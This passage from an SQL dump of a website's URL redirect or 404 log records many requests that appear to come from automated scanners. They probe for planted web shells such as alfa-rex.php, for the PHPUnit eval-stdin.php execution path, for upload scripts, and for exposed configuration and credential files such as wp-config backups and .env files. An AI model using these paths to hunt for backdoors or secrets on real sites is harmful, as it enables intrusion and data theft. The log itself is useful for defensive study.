00:00:00',301),(63687,'http://www.3s-technologies.com.tr/tr/kikikoko.php',NULL,'','',1,0,'2026-04-21 19:56:29','0000-00-00 00:00:00',301),(63688,'http://www.3s-technologies.com.tr/tr/nwflm.php',NULL,'','',1,0,'2026-04-21 19:56:29','0000-00-00 00:00:00',301),(63689,'http://www.3s-technologies.com.tr/tr/awa.php',NULL,'','',1,0,'2026-04-21 19:56:32','0000-00-00 00:00:00',301),(63690,'http://www.3s-technologies.com.tr/tr/popo.php',NULL,'','',1,0,'2026-04-21 19:56:33','0000-00-00 00:00:00',301),(63691,'http://www.3s-technologies.com.tr/tr/water.php',NULL,'','',1,0,'2026-04-21 19:56:33','0000-00-00 00:00:00',301),(63692,'http://www.3s-technologies.com.tr/tr/wert.php',NULL,'','',1,0,'2026-04-21 19:56:35','0000-00-00 00:00:00',301),(63693,'http://www.3s-technologies.com.tr/tr/oij98gy.php',NULL,'','',1,0,'2026-04-21 19:56:37','0000-00-00 00:00:00',301),(63694,'http://3s-technologies.com.tr/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2026-04-22 10:36:38','0000-00-00 00:00:00',301),(63695,'http://mail.3s-technologies.com.tr/tr/.sghb.php',NULL,'','',4,0,'2026-04-22 12:03:00','0000-00-00 00:00:00',301),(63696,'http://mail.3s-technologies.com.tr/tr/zoko.php',NULL,'','',4,0,'2026-04-22 12:03:01','0000-00-00 00:00:00',301),(63697,'http://mail.3s-technologies.com.tr/tr/solo1.php',NULL,'','',5,0,'2026-04-22 12:03:02','0000-00-00 00:00:00',301),(63698,'http://mail.3s-technologies.com.tr/tr/locales.php',NULL,'','',4,0,'2026-04-22 12:03:02','0000-00-00 00:00:00',301),(63699,'http://mail.3s-technologies.com.tr/tr/pucci.php',NULL,'','',5,0,'2026-04-22 12:03:04','0000-00-00 00:00:00',301),(63700,'http://mail.3s-technologies.com.tr/tr/wp-includes/blocks/details',NULL,'','',5,0,'2026-04-22 12:03:04','0000-00-00 00:00:00',301),(63701,'http://mail.3s-technologies.com.tr/tr/wp-includes/blocks/audio',NULL,'','',5,0,'2026-04-22 12:03:05','0000-00-00 00:00:00',301),(63702,'http://mail.3s-technologies.com.tr/tr/.tmb',NULL,'','',4,0,'2026-04-22 12:03:06','0000-00-00 00:00:00',301),(63703,'http://mail.3s-technologies.com.tr/tr/.admin.php',NULL,'','',2,0,'2026-04-22 12:03:07','0000-00-00 00:00:00',301),(63704,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfive/assets',NULL,'','',4,0,'2026-04-22 12:03:10','0000-00-00 00:00:00',301),(63705,'http://mail.3s-technologies.com.tr/tr/wp-includes/blocks/buttons',NULL,'','',5,0,'2026-04-22 12:03:10','0000-00-00 00:00:00',301),(63706,'http://mail.3s-technologies.com.tr/tr/class-bda.php',NULL,'','',4,0,'2026-04-22 12:03:11','0000-00-00 00:00:00',301),(63707,'http://mail.3s-technologies.com.tr/tr/bhm.php',NULL,'','',4,0,'2026-04-22 12:03:12','0000-00-00 00:00:00',301),(63708,'http://mail.3s-technologies.com.tr/tr/xmu.php',NULL,'','',9,0,'2026-04-22 12:03:12','0000-00-00 00:00:00',301),(63709,'http://mail.3s-technologies.com.tr/tr/ref.php',NULL,'','',3,0,'2026-04-22 12:03:13','0000-00-00 00:00:00',301),(63710,'http://mail.3s-technologies.com.tr/tr/ktfow.php',NULL,'','',4,0,'2026-04-22 12:03:15','0000-00-00 00:00:00',301),(63711,'http://mail.3s-technologies.com.tr/tr/xmini.php',NULL,'','',2,0,'2026-04-22 12:03:17','0000-00-00 00:00:00',301),(63712,'http://mail.3s-technologies.com.tr/tr/2468.php',NULL,'','',4,0,'2026-04-22 12:03:18','0000-00-00 00:00:00',301),(63713,'http://mail.3s-technologies.com.tr/tr/.about.php',NULL,'','',1,0,'2026-04-22 12:03:42','0000-00-00 00:00:00',301),(63714,'http://3s-technologies.com.tr/tr/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2026-04-22 18:07:57','0000-00-00 00:00:00',301),(63715,'http://www.3s-technologies.com.tr/tr/plugin-install.php',NULL,'','',1,0,'2026-04-23 01:31:09','0000-00-00 00:00:00',301),(63716,'http://www.3s-technologies.com.tr/tr/wp-kikikoko.php',NULL,'','',1,0,'2026-04-23 01:31:10','0000-00-00 00:00:00',301),(63717,'http://www.3s-technologies.com.tr/tr/eetu.php',NULL,'','',1,0,'2026-04-23 01:31:18','0000-00-00 00:00:00',301),(63718,'http://www.3s-technologies.com.tr/tr/tymn.php',NULL,'','',1,0,'2026-04-23 01:31:29','0000-00-00 00:00:00',301),(63719,'http://www.3s-technologies.com.tr/tr/wp-class-atom.php',NULL,'','',1,0,'2026-04-23 01:31:32','0000-00-00 00:00:00',301),(63720,'http://www.3s-technologies.com.tr/tr/jk.php',NULL,'','',1,0,'2026-04-23 01:31:35','0000-00-00 00:00:00',301),(63721,'http://www.3s-technologies.com.tr/tr/adoms.php',NULL,'','',1,0,'2026-04-23 01:31:41','0000-00-00 00:00:00',301),(63722,'http://www.3s-technologies.com.tr/tr/plugin-editor.php',NULL,'','',1,0,'2026-04-23 01:31:41','0000-00-00 00:00:00',301),(63723,'http://www.3s-technologies.com.tr/tr/gcqoa.php',NULL,'','',1,0,'2026-04-23 01:31:57','0000-00-00 00:00:00',301),(63724,'http://www.3s-technologies.com.tr/tr/wp-class-api.php',NULL,'','',1,0,'2026-04-23 01:32:00','0000-00-00 00:00:00',301),(63725,'http://mail.3s-technologies.com.tr/tr/485.php',NULL,'','',3,0,'2026-04-23 08:27:43','0000-00-00 00:00:00',301),(63726,'http://mail.3s-technologies.com.tr/tr/drykl.php',NULL,'','',10,0,'2026-04-23 08:27:44','0000-00-00 00:00:00',301),(63727,'http://mail.3s-technologies.com.tr/tr/xminie.php',NULL,'','',4,0,'2026-04-23 08:27:45','0000-00-00 00:00:00',301),(63728,'http://mail.3s-technologies.com.tr/tr/x=34.php',NULL,'','',4,0,'2026-04-23 08:27:46','0000-00-00 00:00:00',301),(63729,'http://mail.3s-technologies.com.tr/tr/insta.php',NULL,'','',8,0,'2026-04-23 08:27:47','0000-00-00 00:00:00',301),(63730,'http://mail.3s-technologies.com.tr/tr/xxa.php',NULL,'','',8,0,'2026-04-23 08:27:48','0000-00-00 00:00:00',301),(63731,'http://mail.3s-technologies.com.tr/tr/zxcs.php',NULL,'','',2,0,'2026-04-23 08:27:49','0000-00-00 00:00:00',301),(63732,'http://3s-technologies.com.tr/tr/485.php',NULL,'','',8,0,'2026-04-23 10:00:45','0000-00-00 00:00:00',301),(63733,'http://3s-technologies.com.tr/tr/drykl.php',NULL,'','',19,0,'2026-04-23 10:00:45','0000-00-00 00:00:00',301),(63734,'http://3s-technologies.com.tr/tr/wp-content/r.php',NULL,'','',1,0,'2026-04-24 07:30:47','0000-00-00 00:00:00',301),(63735,'http://www.3s-technologies.com.tr/tr/bkyac.php',NULL,'','',1,0,'2026-04-24 09:13:03','0000-00-00 00:00:00',301),(63736,'http://www.3s-technologies.com.tr/tr/public/olezrvqmjjpfsucdefault.php',NULL,'','',1,0,'2026-04-24 09:13:05','0000-00-00 00:00:00',301),(63737,'http://www.3s-technologies.com.tr/tr/ctex1.php',NULL,'','',1,0,'2026-04-24 09:13:18','0000-00-00 00:00:00',301),(63738,'http://www.3s-technologies.com.tr/tr/amwxl.php',NULL,'','',1,0,'2026-04-24 09:13:27','0000-00-00 00:00:00',301),(63739,'http://www.3s-technologies.com.tr/tr/userfuns.php',NULL,'','',1,0,'2026-04-24 09:13:29','0000-00-00 00:00:00',301),(63740,'http://www.3s-technologies.com.tr/tr/casp1.php',NULL,'','',1,0,'2026-04-24 09:13:42','0000-00-00 00:00:00',301),(63741,'http://www.3s-technologies.com.tr/tr/prosellers8.php',NULL,'','',1,0,'2026-04-24 09:13:53','0000-00-00 00:00:00',301),(63742,'http://www.3s-technologies.com.tr/tr/shop.php',NULL,'','',1,0,'2026-04-24 09:13:54','0000-00-00 00:00:00',301),(63743,'http://www.3s-technologies.com.tr/tr/fsjzs.php',NULL,'','',1,0,'2026-04-24 09:13:55','0000-00-00 00:00:00',301),(63744,'http://www.3s-technologies.com.tr/tr/cwclass.php',NULL,'','',1,0,'2026-04-24 09:13:55','0000-00-00 00:00:00',301),(63745,'http://www.3s-technologies.com.tr/tr/ai.php',NULL,'','',1,0,'2026-04-24 09:13:58','0000-00-00 00:00:00',301),(63746,'http://3s-technologies.com.tr/tr/environments.php',NULL,'','',1,0,'2026-04-24 17:22:36','0000-00-00 00:00:00',301),(63747,'http://3s-technologies.com.tr/tr/development.php',NULL,'','',1,0,'2026-04-24 17:22:40','0000-00-00 00:00:00',301),(63748,'http://3s-technologies.com.tr/tr/db_config.php',NULL,'','',1,0,'2026-04-24 17:22:41','0000-00-00 00:00:00',301),(63749,'http://3s-technologies.com.tr/tr/get_site_info.php',NULL,'','',1,0,'2026-04-24 17:22:42','0000-00-00 00:00:00',301),(63750,'http://3s-technologies.com.tr/tr/deploy.php',NULL,'','',1,0,'2026-04-24 17:22:42','0000-00-00 00:00:00',301),(63751,'http://3s-technologies.com.tr/tr/apis.php',NULL,'','',1,0,'2026-04-24 17:22:43','0000-00-00 00:00:00',301),(63752,'http://3s-technologies.com.tr/tr/._info.php',NULL,'','',1,0,'2026-04-24 17:22:45','0000-00-00 00:00:00',301),(63753,'http://3s-technologies.com.tr/tr/php_flag.php',NULL,'','',1,0,'2026-04-24 17:22:45','0000-00-00 00:00:00',301),(63754,'http://3s-technologies.com.tr/tr/test_info4.php',NULL,'','',1,0,'2026-04-24 17:22:46','0000-00-00 00:00:00',301),(63755,'http://3s-technologies.com.tr/tr/test_phpinfo2.php',NULL,'','',1,0,'2026-04-24 17:22:47','0000-00-00 00:00:00',301),(63756,'http://3s-technologies.com.tr/tr/hsfpdcd.php',NULL,'','',1,0,'2026-04-24 17:22:47','0000-00-00 00:00:00',301),(63757,'http://3s-technologies.com.tr/tr/config.inc.php',NULL,'','',1,0,'2026-04-24 17:22:47','0000-00-00 00:00:00',301),(63758,'http://3s-technologies.com.tr/tr/profmanage.php',NULL,'','',1,0,'2026-04-24 17:22:51','0000-00-00 00:00:00',301),(63759,'http://3s-technologies.com.tr/tr/makecvs.php',NULL,'','',1,0,'2026-04-24 17:22:51','0000-00-00 00:00:00',301),(63760,'http://3s-technologies.com.tr/tr/phpreleaseinfo.php',NULL,'','',1,0,'2026-04-24 17:22:52','0000-00-00 00:00:00',301),(63761,'http://3s-technologies.com.tr/tr/hkvkjguw.php',NULL,'','',1,0,'2026-04-24 17:22:56','0000-00-00 00:00:00',301),(63762,'http://3s-technologies.com.tr/tr/infoinfo.php',NULL,'','',1,0,'2026-04-24 17:22:57','0000-00-00 00:00:00',301),(63763,'http://3s-technologies.com.tr/tr/t3s.php',NULL,'','',9,0,'2026-04-25 12:20:49','0000-00-00 00:00:00',301),(63764,'http://3s-technologies.com.tr/tr/uwa.php',NULL,'','',8,0,'2026-04-25 12:20:50','0000-00-00 00:00:00',301),(63765,'http://3s-technologies.com.tr/tr/crgio.php',NULL,'','',12,0,'2026-04-25 12:20:51','0000-00-00 00:00:00',301),(63766,'http://3s-technologies.com.tr/tr/.sghb.php',NULL,'','',8,0,'2026-04-25 12:20:53','0000-00-00 00:00:00',301),(63767,'http://3s-technologies.com.tr/tr/zoko.php',NULL,'','',7,0,'2026-04-25 12:20:54','0000-00-00 00:00:00',301),(63768,'http://3s-technologies.com.tr/tr/solo1.php',NULL,'','',6,0,'2026-04-25 12:20:54','0000-00-00 00:00:00',301),(63769,'http://3s-technologies.com.tr/tr/locales.php',NULL,'','',5,0,'2026-04-25 12:20:55','0000-00-00 00:00:00',301),(63770,'http://3s-technologies.com.tr/tr/pucci.php',NULL,'','',11,0,'2026-04-25 12:20:56','0000-00-00 00:00:00',301),(63771,'http://3s-technologies.com.tr/tr/one.php',NULL,'','',18,0,'2026-04-25 12:20:59','0000-00-00 00:00:00',301),(63772,'http://3s-technologies.com.tr/tr/no20.php',NULL,'','',4,0,'2026-04-25 12:20:59','0000-00-00 00:00:00',301),(63773,'http://3s-technologies.com.tr/tr/wp-alone.php',NULL,'','',2,0,'2026-04-25 12:21:00','0000-00-00 00:00:00',301),(63774,'http://3s-technologies.com.tr/tr/images/contacto.php',NULL,'','',1,0,'2026-04-25 14:13:12','0000-00-00 00:00:00',301),(63775,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/wp-login.php',NULL,'','',1,0,'2026-04-25 14:13:14','0000-00-00 00:00:00',301),(63776,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:13:14','0000-00-00 00:00:00',301),(63777,'http://3s-technologies.com.tr/tr/wp-admin/maint/s.php',NULL,'','',1,0,'2026-04-25 14:13:15','0000-00-00 00:00:00',301),(63778,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-pagebuilders-plnmt2.php',NULL,'','',1,0,'2026-04-25 14:13:17','0000-00-00 00:00:00',301),(63779,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-media-images.php',NULL,'','',1,0,'2026-04-25 14:13:17','0000-00-00 00:00:00',301),(63780,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-block-method.php',NULL,'','',1,0,'2026-04-25 14:13:18','0000-00-00 00:00:00',301),(63781,'http://3s-technologies.com.tr/tr/images/imageupload.php',NULL,'','',1,0,'2026-04-25 14:13:19','0000-00-00 00:00:00',301),(63782,'http://3s-technologies.com.tr/tr/wp-includes/pomo/ir7szrsouep.php',NULL,'','',1,0,'2026-04-25 14:13:20','0000-00-00 00:00:00',301),(63783,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/daniel.php',NULL,'','',1,0,'2026-04-25 14:13:22','0000-00-00 00:00:00',301),(63784,'http://3s-technologies.com.tr/tr/wp-admin/css/pxmpeijj.php',NULL,'','',1,0,'2026-04-25 14:13:23','0000-00-00 00:00:00',301),(63785,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:13:23','0000-00-00 00:00:00',301),(63786,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-http-requests-response-cron.php',NULL,'','',1,0,'2026-04-25 14:13:24','0000-00-00 00:00:00',301),(63787,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:13:29','0000-00-00 00:00:00',301),(63788,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-http-ixr-client-url.php',NULL,'','',1,0,'2026-04-25 14:13:31','0000-00-00 00:00:00',301),(63789,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/sefer.php',NULL,'','',1,0,'2026-04-25 14:13:33','0000-00-00 00:00:00',301),(63790,'http://3s-technologies.com.tr/tr/wp-includes/fonts/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:13:34','0000-00-00 00:00:00',301),(63791,'http://3s-technologies.com.tr/tr/wp-includes/blocks/wp-login.php',NULL,'','',1,0,'2026-04-25 14:13:35','0000-00-00 00:00:00',301),(63792,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns-set.php',NULL,'','',1,0,'2026-04-25 14:13:36','0000-00-00 00:00:00',301),(63793,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/get_resource_type.php',NULL,'','',1,0,'2026-04-25 14:13:37','0000-00-00 00:00:00',301),(63794,'http://3s-technologies.com.tr/tr/wp-includes/widgets/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:13:37','0000-00-00 00:00:00',301),(63795,'http://3s-technologies.com.tr/tr/images/imscjpg.php',NULL,'','',1,0,'2026-04-25 14:13:40','0000-00-00 00:00:00',301),(63796,'http://3s-technologies.com.tr/tr/wp-includes/text/gi.php',NULL,'','',1,0,'2026-04-25 14:13:42','0000-00-00 00:00:00',301),(63797,'http://3s-technologies.com.tr/tr/.well-known/zgpqatcz.php',NULL,'','',1,0,'2026-04-25 14:13:43','0000-00-00 00:00:00',301),(63798,'http://3s-technologies.com.tr/tr/images/fb.php',NULL,'','',1,0,'2026-04-25 14:13:48','0000-00-00 00:00:00',301),(63799,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:13:52','0000-00-00 00:00:00',301),(63800,'http://3s-technologies.com.tr/tr/wp-includes/images/crystal/wp-login.php',NULL,'','',1,0,'2026-04-25 14:13:53','0000-00-00 00:00:00',301),(63801,'http://3s-technologies.com.tr/tr/wp-includes/class-phpass-private.php',NULL,'','',1,0,'2026-04-25 14:13:56','0000-00-00 00:00:00',301),(63802,'http://3s-technologies.com.tr/tr/wp-includes/id3/mariju.php',NULL,'','',1,0,'2026-04-25 14:13:57','0000-00-00 00:00:00',301),(63803,'http://3s-technologies.com.tr/tr/wp-admin/includes/222.php',NULL,'','',1,0,'2026-04-25 14:14:02','0000-00-00 00:00:00',301),(63804,'http://3s-technologies.com.tr/tr/.well-known/tskijagj.php',NULL,'','',1,0,'2026-04-25 14:14:02','0000-00-00 00:00:00',301),(63805,'http://3s-technologies.com.tr/tr/wp-admin/images/apreset.php',NULL,'','',1,0,'2026-04-25 14:14:04','0000-00-00 00:00:00',301),(63806,'http://3s-technologies.com.tr/tr/images/index1.php',NULL,'','',1,0,'2026-04-25 14:14:04','0000-00-00 00:00:00',301),(63807,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-tags.php',NULL,'','',1,0,'2026-04-25 14:14:05','0000-00-00 00:00:00',301),(63808,'http://3s-technologies.com.tr/tr/images/upload-size.php',NULL,'','',1,0,'2026-04-25 14:14:08','0000-00-00 00:00:00',301),(63809,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ttpch.php',NULL,'','',1,0,'2026-04-25 14:14:10','0000-00-00 00:00:00',301),(63810,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/modern/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:14:11','0000-00-00 00:00:00',301),(63811,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-post-condition.php',NULL,'','',1,0,'2026-04-25 14:14:11','0000-00-00 00:00:00',301),(63812,'http://3s-technologies.com.tr/tr/wp-admin/includes/error.php',NULL,'','',1,0,'2026-04-25 14:14:12','0000-00-00 00:00:00',301),(63813,'http://3s-technologies.com.tr/tr/images/indes.php',NULL,'','',1,0,'2026-04-25 14:14:13','0000-00-00 00:00:00',301),(63814,'http://3s-technologies.com.tr/tr/images/all2.php',NULL,'','',1,0,'2026-04-25 14:14:13','0000-00-00 00:00:00',301),(63815,'http://3s-technologies.com.tr/tr/images/imscjpg1.php',NULL,'','',1,0,'2026-04-25 14:14:14','0000-00-00 00:00:00',301),(63816,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/about.php',NULL,'','',1,0,'2026-04-25 14:14:16','0000-00-00 00:00:00',301),(63817,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/wp-login.php',NULL,'','',1,0,'2026-04-25 14:14:16','0000-00-00 00:00:00',301),(63818,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/wp-login.php',NULL,'','',1,0,'2026-04-25 14:14:17','0000-00-00 00:00:00',301),(63819,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:14:19','0000-00-00 00:00:00',301),(63820,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-automatic-upgrader-skin-event.php',NULL,'','',1,0,'2026-04-25 14:14:19','0000-00-00 00:00:00',301),(63821,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/sx.php',NULL,'','',1,0,'2026-04-25 14:14:21','0000-00-00 00:00:00',301),(63822,'http://3s-technologies.com.tr/tr/wp-admin/css/likbxe.php',NULL,'','',1,0,'2026-04-25 14:14:23','0000-00-00 00:00:00',301),(63823,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/wp-login.php',NULL,'','',1,0,'2026-04-25 14:14:26','0000-00-00 00:00:00',301),(63824,'http://3s-technologies.com.tr/tr/wp-content/upgrade/embed.php',NULL,'','',1,0,'2026-04-25 14:14:27','0000-00-00 00:00:00',301),(63825,'http://3s-technologies.com.tr/tr/images/uu_file_upload.php',NULL,'','',1,0,'2026-04-25 14:14:29','0000-00-00 00:00:00',301),(63826,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/admin.php',NULL,'','',1,0,'2026-04-25 14:14:30','0000-00-00 00:00:00',301),(63827,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:14:34','0000-00-00 00:00:00',301),(63828,'http://3s-technologies.com.tr/tr/.well-known/hyknpcxe.php',NULL,'','',1,0,'2026-04-25 14:14:36','0000-00-00 00:00:00',301),(63829,'http://3s-technologies.com.tr/tr/wp-includes/blocks/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:14:39','0000-00-00 00:00:00',301),(63830,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:14:39','0000-00-00 00:00:00',301),(63831,'http://3s-technologies.com.tr/tr/wp-admin/css/media.php',NULL,'','',1,0,'2026-04-25 14:14:42','0000-00-00 00:00:00',301),(63832,'http://3s-technologies.com.tr/tr/wp-includes/pomo/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:14:43','0000-00-00 00:00:00',301),(63833,'http://3s-technologies.com.tr/tr/wp-includes/wp-loader.php',NULL,'','',1,0,'2026-04-25 14:14:43','0000-00-00 00:00:00',301),(63834,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/colors.css.php',NULL,'','',1,0,'2026-04-25 14:14:45','0000-00-00 00:00:00',301),(63835,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/error.php',NULL,'','',1,0,'2026-04-25 14:14:45','0000-00-00 00:00:00',301),(63836,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/class-wp-sitemaps-upload.php/wp-admin/js/widgets/qlex1.php',NULL,'','',1,0,'2026-04-25 14:14:46','0000-00-00 00:00:00',301),(63837,'http://3s-technologies.com.tr/tr/wp-admin/includes/schema-part.php',NULL,'','',1,0,'2026-04-25 14:14:47','0000-00-00 00:00:00',301),(63838,'http://3s-technologies.com.tr/tr/.well-known/cofbgxlk.php',NULL,'','',1,0,'2026-04-25 14:14:49','0000-00-00 00:00:00',301),(63839,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/modern/cnygvkukxv.php',NULL,'','',1,0,'2026-04-25 14:14:49','0000-00-00 00:00:00',301),(63840,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/template.php',NULL,'','',1,0,'2026-04-25 14:14:52','0000-00-00 00:00:00',301),(63841,'http://3s-technologies.com.tr/tr/uploads/add_online-tpsc_questions.php',NULL,'','',1,0,'2026-04-25 14:14:53','0000-00-00 00:00:00',301),(63842,'http://3s-technologies.com.tr/tr/images/bay.php',NULL,'','',1,0,'2026-04-25 14:14:54','0000-00-00 00:00:00',301),(63843,'http://3s-technologies.com.tr/tr/images/imsc.php',NULL,'','',1,0,'2026-04-25 14:14:54','0000-00-00 00:00:00',301),(63844,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-theme-json-data-edit.php',NULL,'','',1,0,'2026-04-25 14:14:56','0000-00-00 00:00:00',301),(63845,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/tempfuns.php',NULL,'','',1,0,'2026-04-25 14:14:57','0000-00-00 00:00:00',301),(63846,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/mzokjedv.php',NULL,'','',1,0,'2026-04-25 14:14:58','0000-00-00 00:00:00',301),(63847,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/cgqdvbgm.php',NULL,'','',1,0,'2026-04-25 14:14:59','0000-00-00 00:00:00',301),(63848,'http://3s-technologies.com.tr/tr/wp-includes/images/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:15:00','0000-00-00 00:00:00',301),(63849,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/zm1eh.php',NULL,'','',1,0,'2026-04-25 14:15:02','0000-00-00 00:00:00',301),(63850,'http://3s-technologies.com.tr/tr/wp-admin/includes/rfatw.php',NULL,'','',1,0,'2026-04-25 14:15:03','0000-00-00 00:00:00',301),(63851,'http://3s-technologies.com.tr/tr/images/product_image_5d938daef1f0b.php',NULL,'','',1,0,'2026-04-25 14:15:07','0000-00-00 00:00:00',301),(63852,'http://3s-technologies.com.tr/tr/wp-includes/images/crystal/alfa-rex.php',NULL,'','',1,0,'2026-04-25 14:15:08','0000-00-00 00:00:00',301),(63853,'http://mail.3s-technologies.com.tr/tr/t3s.php',NULL,'','',3,0,'2026-04-26 02:26:18','0000-00-00 00:00:00',301),(63854,'http://mail.3s-technologies.com.tr/tr/uwu.php',NULL,'','',4,0,'2026-04-26 02:26:20','0000-00-00 00:00:00',301),(63855,'http://mail.3s-technologies.com.tr/tr/uwa.php',NULL,'','',3,0,'2026-04-26 02:26:21','0000-00-00 00:00:00',301),(63856,'http://mail.3s-technologies.com.tr/tr/crgio.php',NULL,'','',3,0,'2026-04-26 02:26:21','0000-00-00 00:00:00',301),(63857,'http://mail.3s-technologies.com.tr/tr/one.php',NULL,'','',9,0,'2026-04-26 02:26:32','0000-00-00 00:00:00',301),(63858,'http://mail.3s-technologies.com.tr/tr/no20.php',NULL,'','',2,0,'2026-04-26 02:26:33','0000-00-00 00:00:00',301),(63859,'http://mail.3s-technologies.com.tr/tr/wp-alone.php',NULL,'','',1,0,'2026-04-26 02:26:33','0000-00-00 00:00:00',301),(63860,'https://www.3s-technologies.com.tr/en/file-manager/initialize',NULL,'','',1,0,'2026-04-26 16:23:19','0000-00-00 00:00:00',301),(63861,'http://www.3s-technologies.com.tr/en/file-manager/initialize',NULL,'','',1,0,'2026-04-26 16:23:20','0000-00-00 00:00:00',301),(63862,'http://3s-technologies.com.tr/en/service-providers-directory.html?id=109',NULL,'','',1,0,'2026-04-26 18:24:31','0000-00-00 00:00:00',301),(63863,'http://3s-technologies.com.tr/tr/strcmp.php',NULL,'','',1,0,'2026-04-27 13:46:04','0000-00-00 00:00:00',301),(63864,'http://3s-technologies.com.tr/tr/wp-includes_function.php',NULL,'','',1,0,'2026-04-27 13:46:07','0000-00-00 00:00:00',301),(63865,'http://3s-technologies.com.tr/tr/caches.php',NULL,'','',1,0,'2026-04-27 13:46:16','0000-00-00 00:00:00',301),(63866,'http://3s-technologies.com.tr/tr/gzdecodes.php',NULL,'','',1,0,'2026-04-27 13:46:20','0000-00-00 00:00:00',301),(63867,'http://3s-technologies.com.tr/tr/verinfo.php',NULL,'','',1,0,'2026-04-27 13:46:22','0000-00-00 00:00:00',301),(63868,'http://3s-technologies.com.tr/tr/agent.php',NULL,'','',1,0,'2026-04-27 13:46:22','0000-00-00 00:00:00',301),(63869,'http://3s-technologies.com.tr/tr/sys_info.php',NULL,'','',1,0,'2026-04-27 13:46:23','0000-00-00 00:00:00',301),(63870,'http://3s-technologies.com.tr/tr/config.old.php',NULL,'','',1,0,'2026-04-27 13:46:25','0000-00-00 00:00:00',301),(63871,'http://3s-technologies.com.tr/tr/connector.minimal.php',NULL,'','',1,0,'2026-04-27 17:36:01','0000-00-00 00:00:00',301),(63872,'http://3s-technologies.com.tr/tr/.env.php.dist',NULL,'','',3,0,'2026-04-27 17:36:02','0000-00-00 00:00:00',301),(63873,'http://3s-technologies.com.tr/tr/applications.php',NULL,'','',1,0,'2026-04-27 17:36:03','0000-00-00 00:00:00',301),(63874,'http://3s-technologies.com.tr/tr/wp-config.php.swo',NULL,'','',2,0,'2026-04-27 17:36:04','0000-00-00 00:00:00',301),(63875,'http://3s-technologies.com.tr/tr/ajax_officebuilding.php',NULL,'','',1,0,'2026-04-27 17:36:05','0000-00-00 00:00:00',301),(63876,'http://3s-technologies.com.tr/tr/sys-details.php',NULL,'','',1,0,'2026-04-27 17:36:05','0000-00-00 00:00:00',301),(63877,'http://3s-technologies.com.tr/tr/release_info.php',NULL,'','',1,0,'2026-04-27 17:36:07','0000-00-00 00:00:00',301),(63878,'http://3s-technologies.com.tr/tr/mailer_url.php',NULL,'','',1,0,'2026-04-27 17:36:08','0000-00-00 00:00:00',301),(63879,'http://3s-technologies.com.tr/tr/connector.php',NULL,'','',1,0,'2026-04-27 17:36:09','0000-00-00 00:00:00',301),(63880,'http://3s-technologies.com.tr/tr/systeminfo.php',NULL,'','',1,0,'2026-04-27 17:36:10','0000-00-00 00:00:00',301),(63881,'http://3s-technologies.com.tr/tr/wp-config.phpc',NULL,'','',1,0,'2026-04-27 17:36:11','0000-00-00 00:00:00',301),(63882,'http://3s-technologies.com.tr/tr/showphpinfo.php',NULL,'','',1,0,'2026-04-27 17:36:11','0000-00-00 00:00:00',301),(63883,'http://3s-technologies.com.tr/tr/phpsysinfo.php',NULL,'','',1,0,'2026-04-27 17:36:13','0000-00-00 00:00:00',301),(63884,'http://3s-technologies.com.tr/tr/phpinfo__.php',NULL,'','',1,0,'2026-04-27 17:36:14','0000-00-00 00:00:00',301),(63885,'http://3s-technologies.com.tr/tr/sys-info.php',NULL,'','',1,0,'2026-04-27 17:36:14','0000-00-00 00:00:00',301),(63886,'http://3s-technologies.com.tr/tr/fraie1p4.php',NULL,'','',1,0,'2026-04-27 17:36:17','0000-00-00 00:00:00',301),(63887,'http://3s-technologies.com.tr/tr/routes.php',NULL,'','',1,0,'2026-04-27 17:36:17','0000-00-00 00:00:00',301),(63888,'http://3s-technologies.com.tr/tr/content.php888',NULL,'','',1,0,'2026-04-27 